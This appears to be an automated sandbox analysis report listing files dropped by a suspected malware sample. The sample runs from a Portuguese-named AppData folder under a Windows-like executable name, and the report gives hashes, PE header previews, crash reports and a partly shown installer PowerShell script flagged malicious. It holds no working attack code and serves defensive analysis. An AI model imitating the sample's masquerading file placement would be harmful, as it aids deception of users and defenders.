                                                                  SSDEEP:768:6yYUIATW3mYRfDNRFxvBqmTu9oUADyPH612ojJx2z94XSJj4:ZMvRPBqmqdlovb44XSJ4
                                                                  MD5:541703A97409F03643B2F8AE7A534509
                                                                  SHA1:BF5A64870DC5C3DFDC2209321BC1E5C62C21FFA8
                                                                  SHA-256:0F18A5ADD9085FDBF60909A8CCA9DBE79F143AF2551926D7492192A7501B40DB
                                                                  SHA-512:600BD2FEC8FA91CD5D86B1E51A7267D72EDD4DA8A2A2EF32E867319FAF45E3F479A2EBB4D5908DB59901877227EBCA5EDF7F60536966D0989F971898A2F7AF2C
                                                                  Malicious:true
                                                                  Preview:)3.~{..J.F..P............O...A1X^.{!l..-]C.@..n.g5\.....?...&.J..M.".i..#...Ec..Pl..p.C....'.o ....3-....lo...<M.m....i....~..yF...E....-..*.~.n.p.B...P..r.&......k..y|......{..C...\...k..~..~*.7...2.X.,.].....D...KR._<8..XD;.........=.L...*.8rw.7.A.K...R.......^<.B.Yd.z........+7s....j.......MP"..=.}ro.x..-O....7a!.....^Ir.|.E..=.1....H.....17./.C...$(.....&r]^.G...5"H.,D~..X.K.....%....",..c#.....,N....%.........f.g@.'V.5......a.{.mi;.;..P9...[l.G.W...0.E|....7.R#.M.+6.Y.Y.0e(..q...oy.....!..1.S..!...p...J..@.....n.]....R..n..EO......#..Pb........ejN....$2EUF....m...2..z.#t..t..)..r.M.7.a.rV....2.o..O`M.U..6...4-...Q.....P.c.N.?....U...o..CW..z..b...c.EM.o..Z&...*.....%..;.i$V....rx.:.......o.:.:.?/)..B..yy5..N)..f..T...,...7.$D....E..Bf...P....&.+.<.....l.....J.>.4..s....b@6Cs|.W*..A.D\..:..]..gSk"3..\.pRrP. ..t...a...e$......T.lB+..b..."e...R.w~...]?j.).35.Wf[.I.V..%.M...0A.A>...n.f....._..._...Z.u.. .W..n..N..A%w.......h....m.!..S/.*. ..,MOx
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2795808
                                                                  Entropy (8bit):6.555908525069811
                                                                  Encrypted:false
                                                                  SSDEEP:49152:E+L6USzSUQMZkwSh6GO/4JI5bLt9zwn3q+7WTFvxnf5rcP:cd/ddrLtGWf
                                                                  MD5:D09B0BCEAACCB0B4C2FC6B95B9A5241A
                                                                  SHA1:5ADA2EDDC6954DFC50AFF07276909866418CE799
                                                                  SHA-256:13E2A3B4DDFF74975FD41B9A1D4ED57DE5EC67C0F377791DBBBA5C8402690EB8
                                                                  SHA-512:AEC811B8AE222D21108FFF90C501278CFCCC1D76F4B01469339F08F09514FF31D508E2ABEC7ED3C53E196F34AB73544BE969E5E284A220E0206D680D8E602BA7
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....uf.........."............................@..............................+.......+...`..........................................Z"......[".d.... &..C....$.......*. )...p+.."...1".8....................0".(...p...@...........Xc".p...0L"......................text...S........................... ..`.rdata..|........ ..................@..@.data...`.... #.......#.............@....pdata........$.......#.............@..@.gxfg.........%..0....$.............@..@.retplne......%.......%..................tls....1.....%.......%.............@...CPADinfo8.....%.......%.............@..._RDATA........&.......%.............@..@malloc_h......&.......%............. ..`.rsrc....C... &..D....%.............@..@.reloc..."...p+..$...\*.............@..B........................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):734375
                                                                  Entropy (8bit):7.96368320948898
                                                                  Encrypted:false
                                                                  SSDEEP:12288:8I3H1fJod/zgsz5B0GDJQrnKs8SNP+QSsSilxNwt0D+cImfd8xEqoO0TehEr2:b3VB4zEEmPLSUNwt0KcV6xEqoO0TO5
                                                                  MD5:D7E5189AFFC7F032A6A2D5E4213395C8
                                                                  SHA1:DD9A1D0DAD42162953E30D6351A427D6D8665918
                                                                  SHA-256:652A51FF9C655862A5C5A876BE3252757D12543ADCE27EAF76C0287C976D2B30
                                                                  SHA-512:7EB21092941DBA3CCD1AF9B8B9D884943FDA9DB253FC537A03E297C39E1FE7F98459A0CFCBB25D9C5B7873D2FC42221D038AB2ADA5D687690552A13686024D09
                                                                  Malicious:false
                                                                  Preview:..........H..."...........^...........~.........p?9...q?....r?....s?z...t?...u?N...v?....w?....x?d...y?...z?!...{?w...|?...}?,...~?.....?....?8....?.....?....?.....?.....?)....?o....?.....?Q....?.....?.....?.....?c....?.....?.....?Y....?T....?#....?.....?s....?.....?.....?3....?n....?S....?.....?.....?#....?.....?.&...?|'...?.'...?.@...?.B...?kB...?.B...?.K...?.U...?+i...?.}...?.~...?#....?~....?/....?E....?w....?.....?.....?F....?.....?`....?.....?.....?.....?5....?.....?.....?.....?#....?.....?.....?N....?=....?c....?.....?.!...?.)...?l2...?r;...?.D...?.N...?CW...?'`...?.j...?.s...?:{...?....?3....?x....?`....?.....?H....?.....?.....?.)...?.>...?5Q...?@m...?.....?....?Y....?.....?.....?.....?.....?d....?=(...?.;...?.I...?R_...?vj...?kt...?.{...?.....?D....?.....?.....?T....?Q....?.....?.....?}....?.....?Z....?.....?.....@. ...@J2...@MD...@.P...@.]...@.n...@b....@'....@.....@.....@.....@.....@.....@&....@.....@.....@.....@....%@#...&@....'@....(@....)@....*@....+@....,@. ..-@.&
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):20130304
                                                                  Entropy (8bit):6.679078580506966
                                                                  Encrypted:false
                                                                  SSDEEP:393216:XADvxWkQEJSNJexGjkATzOmuv5JJpP/s:XiIkGk/JpP
                                                                  MD5:5C1DAE3753C418C5D2998655CCBA742A
                                                                  SHA1:C675209868F8431433CC13ED7D6C8A342BD8F1E9
                                                                  SHA-256:E4ECA44FD96BDC610E0F1A0469684E8821FBF488496A5B05D316CFADD6A797BE
                                                                  SHA-512:E41014263037B06E2981CA0215F1B29F9DE0B04ED7A322CEA568CE8CC891DBE5BE56620CBDA73F9D32D6A250DDAAD819AD0F6CCBD7A7618E8A2D7B189B632699
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  • Antivirus: Virustotal, Detection: 7%, Browse
                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........PE..d....2.f.........." .....z....K...............@..............................0<...........`.......................... ..........................|.....2.d...PD)...............2.\9...................................................`......P........................text....y.......z.................. ..`.data...8X.......Z...~..............@....bss.....................................idata...Y.......Z..................@....didata..............2..............@....edata..............................@..@.rdata..E...........................@..@.Qg}.....5.......6..................@..@.pdata...h.......j..................@..@.zJ\....V.2..P....2..r.............. ..`.'i+....@....`.......~..............@....8i0.....W.......X..................`..h.rsrc...d.....2.......).............@..@.reloc..\9....2..:....).............@..B....@..@........................................
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1526048
                                                                  Entropy (8bit):6.312728707391181
                                                                  Encrypted:false
                                                                  SSDEEP:12288:BSPqsQ+j9IS5/7PsMaaCi0aaGzHl1IbgTU2fYKsy4meOFeeo7xh0Qzo8sM0+nk8J:RsQ83Tka6ozFibgI2QKuveo7Lzn
                                                                  MD5:FF7F8FE57822B5CB61F519A0298428DE
                                                                  SHA1:030B124A5F3BBE550F84F4BACAB03D1F1CAEE516
                                                                  SHA-256:5BC0B57B68E514F393946C8A3C775B920C8552887479B3F68251804E0217E0C0
                                                                  SHA-512:7D504F7CEFB64DAC9090EF960211AA1D80EC6542B0016682AEEFF33A125D611867342B8A010FD63553F281C10CC3E9B3D6A339F6A0C054E5E272C997406671D1
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....6e.........."......`.....................@..........................................`.........................................pe..\....e.......0...&........... .. )...`.......Z.......................X..(...p...@...........pl...............................text...f^.......`.................. ..`.rdata..L....p.......d..............@..@.data...@....0......................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h..... ...................... ..`.rsrc....&...0...(..................@..@.reloc.......`......................@..B................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:MS Windows cursor resource - 1 icon, 32x32, hotspot @0x0
                                                                  Category:dropped
                                                                  Size (bytes):326
                                                                  Entropy (8bit):1.2807478913655284
                                                                  Encrypted:false
                                                                  SSDEEP:3:GlFFXlGFllfl/t+lklel/e/hRD:Gl/Nls62bD
                                                                  MD5:DBD44C4AC444D2E0448EC0AD24EC0698
                                                                  SHA1:371D786818F0A4242D2FCED0C83412CAA6C17A28
                                                                  SHA-256:BF79BFFDBA70F456CB406FD1ECE8652750363B94188510B5D73F36C8EA6E7AE9
                                                                  SHA-512:E8025CEB6ECB76B480F279D7E42DEEC8B96C0C1D64CFA3B7AF1E68320281F0F2A9B886AFC16AADE4E2178878970C4909FD650C1DC3C37594D040141ED0AB113F
                                                                  Malicious:false
                                                                  Preview:...... ......0.......(... ...@.......................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):84
                                                                  Entropy (8bit):5.4098254583385135
                                                                  Encrypted:false
                                                                  SSDEEP:3:LWKVReA4uSXRfuKp6A/z2WDuQfGpTI:bU1uSXRfuKpxLfyI
                                                                  MD5:EEFD67557A686021D4C56D9BE9BE3992
                                                                  SHA1:FE00743511BADBD051371E9EED28C76A7F86A9A1
                                                                  SHA-256:D3212F324599C6AD44EFE8A92FEDF268F396A2573B93E7DC54B5CC3544A36264
                                                                  SHA-512:98ADC368431F3145D0D4E7230957F6B0B20F78207715C5B97E7720560BA734113F1FAD780385AC5BF7D8EBAE26DEB147464386D15B6626397B91E4C0A25608F1
                                                                  Malicious:false
                                                                  Preview:9WWEUsqpXLd5YX/8+o0t3uklkvhkyArOftw2tfGV+y13cGhogOn+eZVzQbsv+wT6Le5zcp0ua27uoI7t6wOf
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):957728
                                                                  Entropy (8bit):6.61749314970573
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Chn0GjuAhKHBEwjUrHyu6Z5W1DYsHq6g3P0zAk74fJQf:ChdMHBEqkHj6Z5W1DYsHq6g3P0zAk7I
                                                                  MD5:CFA38CC9320331B3D7A52A58A6AE4577
                                                                  SHA1:9BAEDFB077FA677ACE979B46F597DAB16038D684
                                                                  SHA-256:F3FA8B4F48697F87D34E8CA0262977FE0A8AE3EB04242E9143B3886E754918A0
                                                                  SHA-512:BA2D9AA803C039F323868CDCEC9B532BBC67A7DD87D4156CF732A5CEAEEC3F804B390B1A03362A314147D7BC339D3B4D50C89673288855CAECD6CF78C13C1513
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...h.0f.........." ................................................................;.....`A............................................<!...&..P................q...t.. )......(.......8.......................(.......@............+...............................text...[........................... ..`.rdata..............................@..@.data....L......."..................@....pdata...q.......r..................@..@.gxfg...P).......*...2..............@..@.retplne.............\...................tls.................^..............@..._RDATA...............`..............@..@.rsrc................b..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):0.9195496866432417
                                                                  Encrypted:false
                                                                  SSDEEP:192:V0ttKZPC0cdL/lijP2ZFCPqzuiFFZ24lO8qs:SfKZPJcdL/lijSzuiFFY4lO8qs
                                                                  MD5:93FA0A071EECD155B674D032AC726CDB
                                                                  SHA1:47FA40D158BA79F97E3A80DE45F62EEC6F6195FF
                                                                  SHA-256:5289EF53693B7D4FAD07C32BB745CDEA778523ED55E1C0413D53573527C213B2
                                                                  SHA-512:79C88F5B70FD136BD24DC6655D9917A7C486FE453D2F6A8B684C617FCD7056D5285D1E8D22EC5CADE96C29B302E41DD4B92DB08B949601BC3345113DA754AE9A
                                                                  Malicious:false
                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.1.3.6.5.8.1.9.0.0.2.8.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.5.1.3.6.5.8.2.6.0.3.4.0.0.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.9.3.d.9.f.5.-.2.7.1.1.-.4.8.7.f.-.b.d.5.7.-.a.2.6.b.3.2.1.0.5.3.f.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.1.4.5.8.e.5.c.-.0.5.9.5.-.4.0.8.b.-.b.2.d.5.-.0.2.2.1.e.5.5.2.e.d.1.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.r.o.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.h.r.o.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.3.8.-.0.0.0.1.-.0.0.1.4.-.b.d.d.d.-.2.e.8.7.3.5.d.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.b.0.e.6.5.3.8.d.b.6.4.1.1.1.f.2.c.a.8.a.c.f.b.8.9.6.3.3.d.8.7.0.0.0.0.0.9.0.4.!.0.0.0.0.5.a.d.a.2.e.d.d.c.6.9.5.4.d.f.c.5.0.a.f.f.0.7.2.7.6.9.0.9.8.6.6.4.1.8.c.e.7.9.9.!.c.h.r.o.m.e...e.x.e.....T.a.r.g.
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 14 streams, Thu Jul 11 01:56:22 2024, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):68356
                                                                  Entropy (8bit):1.7804010484128934
                                                                  Encrypted:false
                                                                  SSDEEP:192:sK0nTZ35gKzOJgd3KBREAIF82n1j4IGNV+6DPVLcV6:1mTZ352+daBREAIFn4hNVNNL26
                                                                  MD5:81198DF2510DBB00C636AF3685D2D170
                                                                  SHA1:286E369A206D92502B294B6300118D645DA861DB
                                                                  SHA-256:7D193AB05B49827392F7F7F37907B5B84EB52BFA109566C083F56201303C872E
                                                                  SHA-512:A6627AFACAFCC632F2F94DF4D1D35FCDDB5E3D6C5D14D1627E59F8A89EB40739A41A6C56CCD359B332C46514AD62F3A2E5384977EBF31F58E579422817C6FFB0
                                                                  Malicious:false
                                                                  Preview:MDMP..a..... ........;.f....................................$....2..........T.......8...........T...............$.......................l...............................................................................eJ..............Lw......................T.......8....;.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):6698
                                                                  Entropy (8bit):3.7202390692810616
                                                                  Encrypted:false
                                                                  SSDEEP:96:RSIU6o7wVetbMUNbGYJWMMb5Jr85aMQUa89bzjDVSfz3Rm:R6l7wVeJMURGYkj5SpDa89bzjEfz3Rm
                                                                  MD5:CB99050A1C9C860D13D0E72941C261D6
                                                                  SHA1:484BF3DE6E8C197B61F43F99AEB338CFAE003213
                                                                  SHA-256:2C6205A321322F18CF3ACB89E70268E3A2C693BC3ADF5597E23E2145E68B3190
                                                                  SHA-512:4DD1F7082D2069774977D9295AFD5A2D344FC83A0432EB0D9D7062DCC3F9AEBE51F56DF86109F3043590DE24547678EFDFD596107E6F4E55D212147D6A873E25
                                                                  Malicious:false
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.8.0.<./.P.i.
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4697
                                                                  Entropy (8bit):4.445272381244102
                                                                  Encrypted:false
                                                                  SSDEEP:48:cvIwWl8zs7Jg771I9VCCBUWpW8VYFHYm8M4JGBkaFLyyq85KEx2KoU9U1dd:uIjfVI7IzBN7VkaJGBJyXI2KoU9U1dd
                                                                  MD5:AEF7BA747B996DC0C670A08A416B81D4
                                                                  SHA1:AB1939B8C92ABE195FA4A0EAB35A7B3A759D420F
                                                                  SHA-256:8B1A248A2A8763D5EF3789F7C7FE06A23F0C2D8225BD4E800E5D3E2D71DB028F
                                                                  SHA-512:DD269D1918E0FBD400298BEDD026248EF20943AC45B22CF0987807B31C0728BA69DE76AB46EB9EF0F503BCA9FD548BE6B5775A9DC6108C28AA613D3739F2135B
                                                                  Malicious:false
                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405659" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8003
                                                                  Entropy (8bit):4.840877972214509
                                                                  Encrypted:false
                                                                  SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                  MD5:106D01F562D751E62B702803895E93E0
                                                                  SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                  SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                  SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                  Malicious:false
                                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1388
                                                                  Entropy (8bit):5.427382194649454
                                                                  Encrypted:false
                                                                  SSDEEP:24:3rWSKco4KmZjKbmOIld6lss4RPQoUP7mZ9t7J0gt/NK3R8qia8HSVbl:bWSU4xym/gv4RIoUP7mZ9tK8NWR8qTVR
                                                                  MD5:210C3CA8E94DDC5A9C586CFACDD68718
                                                                  SHA1:A2B382B9936677337064E881C975AD2D2334FE26
                                                                  SHA-256:FCE3AE09352A22FC7F05D136FE71F5C00ED79378C1858A7E66C1F3A4C77314C5
                                                                  SHA-512:258F7DEB38C44497846527C991A1C679601ED53A3FB3E87CF93F88269872E4E56AB7B687A450030F8C9AE6E2584A89D4468FC98D812132DA3AE61E6D9C687F95
                                                                  Malicious:false
                                                                  Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):33
                                                                  Entropy (8bit):4.173033892020167
                                                                  Encrypted:false
                                                                  SSDEEP:3:eJMl7zWv:eJ47zo
                                                                  MD5:8D0C91BC45A53C53A595F929977B8B5A
                                                                  SHA1:9AB24B23F38E83C1F51DC3B827BDFA447A422656
                                                                  SHA-256:BD0392B6AC996038AAC5E6656FB72B863F76261F8FDB5E17281C1B8DB80C2FD6
                                                                  SHA-512:E3E3F394838223C2EF5C143D7077752F3C43B2FDC67AA3E2BE1846D21876F54EB0D2B5A07124CD079BAB5BDB048641BE8534345B28FB3908F4B1F61F31F7C52A
                                                                  Malicious:false
                                                                  Preview:Arquivo ZIP baixado com sucesso!.
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):6668
                                                                  Entropy (8bit):3.5127462716425657
                                                                  Encrypted:false
                                                                  SSDEEP:96:5Wb5VNkKmeHn/V2BVrIovmgNlGjxcj6BngOcvjb:5WbyZ/gVyvb
                                                                  MD5:30C30EF2CB47E35101D13402B5661179
                                                                  SHA1:25696B2AAB86A9233F19017539E2DD83B2F75D4E
                                                                  SHA-256:53094DF6FA4E57A3265FF04BC1E970C10BCDB3D4094AD6DD610C05B7A8B79E0F
                                                                  SHA-512:882BE2768138BB75FF7DDE7D5CA4C2E024699398BAACD0CE1D4619902402E054297E4F464D8CB3C22B2F35D3DABC408122C207FACAD64EC8014F2C54834CF458
                                                                  Malicious:true
                                                                  Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".l.i.n.e.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.L.i.n.e.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1258
